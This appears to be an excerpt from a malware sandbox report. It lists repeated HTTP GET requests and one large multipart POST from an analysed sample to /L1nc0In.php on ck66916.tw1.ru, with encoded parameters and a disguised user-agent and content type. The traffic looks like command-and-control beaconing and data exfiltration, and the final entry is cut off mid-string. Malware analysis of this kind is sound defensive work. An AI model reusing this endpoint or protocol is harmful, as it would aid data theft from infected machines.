                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIhFWN4YzY5IjZyIWZ5gTZycjY3EDOyYzYwAzN0YmM5MmZwcTZhNWY3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=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 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=QX9JSUNJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryCZvrRLBBKVwcdizJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: ck66916.tw1.ruContent-Length: 127919Expect: 100-continue
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4M